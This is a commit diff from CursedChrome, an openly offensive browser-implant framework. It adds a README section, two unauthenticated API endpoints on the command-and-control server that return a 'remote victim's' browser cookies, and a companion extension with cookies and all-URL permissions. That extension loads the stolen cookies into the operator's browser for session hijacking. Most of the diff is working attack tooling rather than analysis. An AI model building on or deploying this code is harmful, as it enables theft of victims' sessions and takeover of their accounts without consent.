mandatoryprogrammer
diff --git a/‎README.md
Lines changed: 14 additions & 0 deletions b/‎README.md
Lines changed: 14 additions & 0 deletions
diff --git a/‎api-server.js
Lines changed: 110 additions & 2 deletions b/‎api-server.js
Lines changed: 110 additions & 2 deletions
diff --git a/‎cookie-sync-extension/icons/icon128.png
8.67 KB b/‎cookie-sync-extension/icons/icon128.png
8.67 KB
diff --git a/‎cookie-sync-extension/icons/icon16.png
829 Bytes b/‎cookie-sync-extension/icons/icon16.png
829 Bytes
diff --git a/‎cookie-sync-extension/icons/icon48.png
3.14 KB b/‎cookie-sync-extension/icons/icon48.png
3.14 KB
diff --git a/‎cookie-sync-extension/manifest.json
Lines changed: 22 additions & 0 deletions b/‎cookie-sync-extension/manifest.json
Lines changed: 22 additions & 0 deletions
diff --git a/‎cookie-sync-extension/src/browser_action/bootstrap.bundle.min.js
Lines changed: 7 additions & 0 deletions b/‎cookie-sync-extension/src/browser_action/bootstrap.bundle.min.js
Lines changed: 7 additions & 0 deletions
diff --git a/‎cookie-sync-extension/src/browser_action/bootstrap.min.css
Lines changed: 7 additions & 0 deletions b/‎cookie-sync-extension/src/browser_action/bootstrap.min.css
Lines changed: 7 additions & 0 deletions
diff --git a/‎cookie-sync-extension/src/browser_action/browser_action.html
Lines changed: 71 additions & 0 deletions b/‎cookie-sync-extension/src/browser_action/browser_action.html
Lines changed: 71 additions & 0 deletions
@@ -97,6 +97,18 @@ To install the example chrome extension implant, do the following:
 
 After you've install the extension it will show up on the admin control panel at `http://localhost:8118`.
 
+## *Required for some sites*: Sync Cookies from Remote Victim
+
+Some sites* require client-side (e.g. JavaScript utilized) cookies, for these sites you'll need to have the `cookies` permission in your implant's `manifest.json` in addition to the other required permissions.
+
+If you have this permission declared, you can then use the Firefox/Chrome extension found in the `cookie-sync-extension/` folder. Load it into your web browser, enter the web panel URL (usually `http://localhost:8118`) and your bot's username/password and click the `Sync Remote Implant Cookies` to load all of your victim's cookies locally.
+
+*How magical!*
+
+*Google Cloud Console is one of these sites - why Google? It's 2020!*
+
+![](./images/sync-cookie-extension.png)
+
 # Production/Operational Usage
 
 ## Modifying Implant Extension
@@ -113,6 +125,8 @@ The following [extension permissions](https://developer.chrome.com/extensions/ap
 ]
 ```
 
+If you want to utilize the Cookie Sync extension to sync the remote browser's cookies with your own (required for some sites), ensure the permission `cookies` is also declared.
+
 This code contains comments on how to modify it for a production setup. Basically doing the following:
 
 * Minifying/stripping/uglifying the JavaScript code
 
@@ -37,7 +37,7 @@ function getMethods(obj) {
     return result;
 };
 
-async function get_api_server() {
+async function get_api_server(proxy_utils) {
     const app = express();
     app.use(bodyParser.json());
 
@@ -91,7 +91,9 @@ async function get_api_server() {
     app.use(async function(req, res, next) {
         const ENDPOINTS_NOT_REQUIRING_AUTH = [
             '/health',
-            `${API_BASE_PATH}/login`
+            `${API_BASE_PATH}/login`,
+            `${API_BASE_PATH}/verify-proxy-credentials`,
+            `${API_BASE_PATH}/get-bot-browser-cookies`,
         ];
         if (ENDPOINTS_NOT_REQUIRING_AUTH.includes(req.originalUrl)) {
             next();
@@ -212,6 +214,15 @@ async function get_api_server() {
             }
         });
 
+        if(!user) {
+            res.status(200).json({
+                "success": false,
+                "error": "User not found with those credentials, please try again.",
+                "code": "INVALID_CREDENTIALS"
+            }).end();
+            return
+        }
+
         // Compare password with hash from database
         const password_matches = await bcrypt.compare(
             req.body.password,
@@ -317,6 +328,103 @@ async function get_api_server() {
         );
     });
 
+    /*
+        Return if a given set of HTTP proxy credentials is valid or not.
+    */
+    const ValidateHTTPProxyCredsSchema = {
+        type: 'object',
+        properties: {
+            username: {
+                type: 'string',
+                required: true
+            },
+            password: {
+                type: 'string',
+                required: true
+            },
+        }
+    }
+    app.post(API_BASE_PATH + '/verify-proxy-credentials', validate({ body: ValidateHTTPProxyCredsSchema }), async (req, res) => {
+        const bot_data = await Bots.findOne({
+            where: {
+                proxy_username: req.body.username,
+                proxy_password: req.body.password,
+            },
+            attributes: [
+                'id',
+                'is_online',
+                'name',
+                'proxy_password',
+                'proxy_username',
+                'user_agent',
+            ]
+        });
+
+        if (!bot_data) {
+            res.status(200).json({
+                "success": false,
+                "error": "User not found with those credentials, please try again.",
+                "code": "INVALID_CREDENTIALS"
+            }).end();
+            return
+        }
+
+        res.status(200).json({
+            "success": true,
+            "result": {
+                id: bot_data.id,
+                is_online: bot_data.is_online,
+                name: bot_data.name,
+                user_agent: bot_data.user_agent
+            }
+        }).end();
+    });
+
+    /*
+        Pull down the cookies from the victim
+    */
+    const GetBotBrowserCookiesSchema = {
+        type: 'object',
+        properties: {
+            username: {
+                type: 'string',
+                required: true
+            },
+            password: {
+                type: 'string',
+                required: true
+            },
+        }
+    }
+    app.post(API_BASE_PATH + '/get-bot-browser-cookies', validate({ body: GetBotBrowserCookiesSchema }), async (req, res) => {
+        const bot_data = await Bots.findOne({
+            where: {
+                proxy_username: req.body.username,
+                proxy_password: req.body.password,
+            }
+        });
+
+        if (!bot_data) {
+            res.status(200).json({
+                "success": false,
+                "error": "User not found with those credentials, please try again.",
+                "code": "INVALID_CREDENTIALS"
+            }).end();
+            return
+        }
+
+        const browser_cookies = await proxy_utils.get_browser_cookie_array(
+            bot_data.browser_id
+        );
+
+        res.status(200).json({
+            "success": true,
+            "result": {
+                "cookies": browser_cookies
+            }
+        }).end();
+    });
+
     /*
      * Handle JSON Schema errors
      */
 
@@ -0,0 +1,22 @@
+{
+  "name": "CursedChrome Cookie Sync Extension",
+  "version": "0.0.1",
+  "manifest_version": 2,
+  "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
+  "description": "Keeps your local browser cookies in sync with the remote victim.",
+  "homepage_url": "https://github.com/mandatoryprogrammer/CursedChrome",
+  "icons": {
+    "16": "icons/icon16.png",
+    "48": "icons/icon48.png",
+    "128": "icons/icon128.png"
+  },
+  "browser_action": {
+    "default_icon": "icons/icon48.png",
+    "default_title": "Cookie Sync settings and credential entry.",
+    "default_popup": "src/browser_action/browser_action.html"
+  },
+  "permissions": [
+    "cookies",
+    "<all_urls>"
+  ]
+}
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+
+<head>
+    <link href="./css/all.css" rel="stylesheet">
+    <link rel="stylesheet" href="./bootstrap.min.css">
+    <link rel="stylesheet" href="./toastr.css">
+    <style>
+.toast {
+    opacity: 1 !important;
+}
+    </style>
+</head>
+
+<body>
+    <div id="app">
+        <div class="card">
+            <div class="card-header">
+                <span class="badge badge-secondary" v-if="loading">
+                    <span class="spinner-border spinner-border-sm mr-1" role="status" aria-hidden="true"></span>Loading...
+                </span>
+                CursedChrome Cookie Sync Extension
+            </div>
+            <div class="card-body" style="min-width: 500px; padding: 20px">
+                <div>
+                    <h5 class="card-title">Extension Configuration</h5>
+                    <div class="alert alert-danger" role="alert" v-if="config_message">
+                        {{config_message}}
+                    </div>
+                    <p class="card-text">
+                        <div class="input-group mb-3">
+                            <div class="input-group-prepend">
+                                <span class="input-group-text">Web Panel URL</span>
+                            </div>
+                            <input type="text" class="form-control" placeholder="http://localhost:8118" v-model="config.url" @keypress="check_login_credentials" @paste="check_login_credentials" v-on:change="check_login_credentials">
+                        </div>
+                        <div class="input-group mb-3">
+                            <div class="input-group-prepend">
+                                <span class="input-group-text">Bot Username</span>
+                            </div>
+                            <input type="text" class="form-control" placeholder="botuserxxxxxxxx" v-model="config.username" @keypress="check_login_credentials" @paste="check_login_credentials" v-on:change="check_login_credentials">
+                        </div>
+                        <div class="input-group mb-3">
+                            <div class="input-group-prepend">
+                                <span class="input-group-text">Bot Password</span>
+                            </div>
+                            <input type="password" class="form-control" placeholder="*********" v-model="config.password" @keypress="check_login_credentials" @paste="check_login_credentials" v-on:change="check_login_credentials">
+                        </div>
+                    </p>
+                    <hr />
+                    <span rel="tooltip" class="d-inline-block" style="width: 100%" tabindex="0" data-toggle="tooltip" title="Valid configuration required." v-if="config.sync_button_disabled">
+                        <button type="button" style="pointer-events: none;" class="btn btn-block btn-primary" disabled>
+                            <i class="fas fa-sync"></i> Sync Remote Implant Cookies
+                        </button>
+                    </span>
+                    <button type="button" class="btn btn-block btn-primary" v-if="!config.sync_button_disabled" v-on:click="sync_cookies_to_browser">
+                        <i class="fas fa-sync"></i> Sync Remote Implant Cookies
+                    </button>
+                </div>
+            </div>
+        </div>
+    </div>
+    <script src="./jquery-3.5.1.min.js"></script>
+    <script src="./popper.min.js"></script>
+    <script src="./toastr.min.js"></script>
+    <script src="./bootstrap.bundle.min.js"></script>
+    <script src="./vue.js"></script>
+    <script src="./main.js"></script>
+</body>
+
+</html>